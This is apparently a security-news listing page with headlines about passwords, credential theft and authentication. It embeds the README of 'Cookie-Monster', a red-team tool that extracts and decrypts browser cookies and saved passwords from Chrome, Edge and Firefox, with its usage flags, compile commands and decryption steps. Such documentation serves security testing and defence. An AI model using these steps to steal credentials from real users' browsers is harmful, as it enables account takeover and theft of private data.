Corrupted Microsoft Office Documents Used In Phishing Campaign

US Senators Propose Law To Require Bare Minimum Security Standards

Put Your Username And Passwords In Your Will, Advises Japan's Government

Will Passkeys Ever Replace Passwords? Can They?

Google Cloud Rolling Out Mandatory MFA for All Users

Thousands Of Hacked TP-Link Routers Used In Yearslong Account Takeovers

Why The Long Name? Okta Discloses Auth Bypass Bug Affecting 52-Character Usernames

EmeraldWhale Steals 15,000 Credentials From Exposed Git Configurations

Colorado Scrambles To Change Voting System Passwords

Windows Themes 0-Day Bug Exposes Users To NTLM Credential Theft

Russian Spies Use RDP Files In Unusual Mass Phishing Drive

AWS Cloud Development Kit Flaw Exposed Accounts To Full Takeover

Millions At Risk From Hardcoded Creds In Popular iOS And Android Apps

Detective Charged With Purchasing Stolen Credentials

Internet Archive Exposed Again – This Time Through Zendesk

The Crusade To Replace Passwords With Passkeys Just Intensified

Internet Archive Leaks User Info And Succumbs To DDoS

Okta Classic Customers Told To Check Logs For Sign-On Bypass

Password Advice for the Rest of Us

Passwords are a problem and it’s hard to make a good one. So what can you do? Make them long, make them random, and maybe use a password manager.

EU Privacy Regulator Fines Meta 91 Million Euros Over Password Storage

Ransomware Gang Using Stolen MS Entra ID Creds To Bust Into Cloud

NIST Proposes Barring Some Of The Most Nonsensical Password Rules

COLDRIVER Crooks Take Pro Democracy NGOs For A Phishy Ride

Infineon's Cryptographic Library Suffers From An ECDSA Private Key Recovery Vulnerability

Intel Claps Back At Report Of SGX Key Theft

Hackers Infect ISPs With Malware That Steals Customer Credentials

SolarWinds Leaks Credentials In Hotfix

Hackers Leak Their Own Operations Through Exposed Telegram Bot API Tokens

FlightAware Admits Passwords, SSNs Exposed For Years

Russian Sells Almost 3,000 Logins, Gets 40 Months In Jail

Are Your GitHub Artifacts Leaking Tokens?

Russia Launching More Sophisticated Phishing Attacks, New Report Finds

Millions Of Websites Susceptible To XSS Attack Via OAuth Implementation Flaw

Vulnerability In Cisco Smart Software Manager Lets Attacker Change Any User Password

Hacker Stole Secrets From OpenAI

Crypto Hacking Thefts Double To 1.4 Billion In First Half Of 2024

Amtrak Confirms Crooks Are Breaking Into User Accounts, Derailing Email Addresses

Prevalence And Impact Of Password Exposure Vulns In ICS/OT

Why Passwords Still Matter In The Age Of AI

TikTok Hackers Target Paris Hilton, CNN, And Other High Profile Users

Secrets Exposed In Hugging Face Attack

Okta Says Customer Identity Cloud Prone To Credential Stuffing Attacks

Researchers Crack 11-Year-Old Password, Recover $3 Million In Bitcoin

BreachForums Returns Just Weeks After FBI-Led Takedown

400,000 Linux Servers Hit By Ebury Botnet

6 Mistakes Organizations Make When Deploying Advanced Authentication

Deploying advanced authentication measures is key to helping organizations address their weakest cybersecurity link: their human users. Having some form of 2-factor authentication in place is a great start, but many organizations may not yet be in that spot or have the needed level of authentication sophistication to adequately safeguard organizational data. When deploying

AWS CloudQuarry: Digging For Secrets In Public AMIs

Google Simplifies 2-Factor Authentication Setup (It's More Important Than Ever)

Google on Monday announced that it's simplifying the process of enabling two-factor authentication (2FA) for users with personal and Workspace accounts. Also called 2-Step Verification (2SV), it aims to add an extra layer of security to users' accounts to prevent takeover attacks in case the passwords are stolen. The new change entails adding a second step method, such as an

Microsoft, Google Do A Victory Lap Around Passkeys

UK Outlaws Awful Default Passwords On Connected Devices

Okta Warns Of Credential Stuffing Attacks Using Tor, Residential Proxies

Scammers Offer Cash To Phone Carrier Staff To Swap SIM Cards

Attackers Are Pummeling Networks Around The World With Millions Of Login Attempts

Cookie-Monster - BOF To Steal Browser Cookies & Credentials

Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.

BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example: 
   cookie-monster --chrome 
   cookie-monster --edge 
   cookie-moster --firefox 
   cookie-monster --chromeCookiePID 1337
   cookie-monster --chromeLoginDataPID 1337
   cookie-monster --edgeCookiePID 4444
   cookie-monster --edgeLoginDataPID 4444
cookie-monster Options: 
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD 
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD 
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file 
    --chromeCookiePID, if chrome PI   D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file  
    --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file  

EXE usage

Cookie Monster Example:
  cookie-monster.exe --all 
Cookie Monster Options:
  -h, --help                     Show this help message and exit
  --all                          Run chrome, edge, and firefox methods
  --edge                         Extract edge keys and download Cookies/Login Data file to PWD
  --chrome                       Extract chrome keys and download Cookies/Login Data file to PWD
  --firefox                      Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make is installed on the linux prior to compiling.

make

to compile exe on windows

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

• update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI

Roku Makes 2FA Mandatory For All After Nearly 600k Accounts Pwned

More Legal Acrimony For Truth Social, As Executive Says He Was Hacked

WordPress LayerSlide Plugin Bug Risks Password Hash Extraction

TheMoon Botnet Resurfaces, Exploiting EoL Devices to Power Criminal Proxy

A botnet previously considered to be rendered inert has been observed enslaving end-of-life (EoL) small home/small office (SOHO) routers and IoT devices to fuel a criminal proxy service called Faceless. "TheMoon, which emerged in 2014, has been operating quietly while growing to over 40,000 bots from 88 countries in January and February of 2024," the Black Lotus Labs team at Lumen

Telegram Offers Premium Subscription in Exchange for Using Your Number to Send OTPs

In June 2017, a study of more than 3,000 Massachusetts Institute of Technology (MIT) students published by the National Bureau for Economic Research (NBER) found that 98% of them were willing to give away their friends' email addresses in exchange for free pizza. "Whereas people say they care about privacy, they are willing to relinquish private data quite easily when

Key Lesson from Microsoft’s Password Spray Hack: Secure Every Account

In January 2024, Microsoft discovered they’d been the victim of a hack orchestrated by Russian-state hackers Midnight Blizzard (sometimes known as Nobelium). The concerning detail about this case is how easy it was to breach the software giant. It wasn’t a highly technical hack that exploited a zero-day vulnerability – the hackers used a simple password spray attack to take control of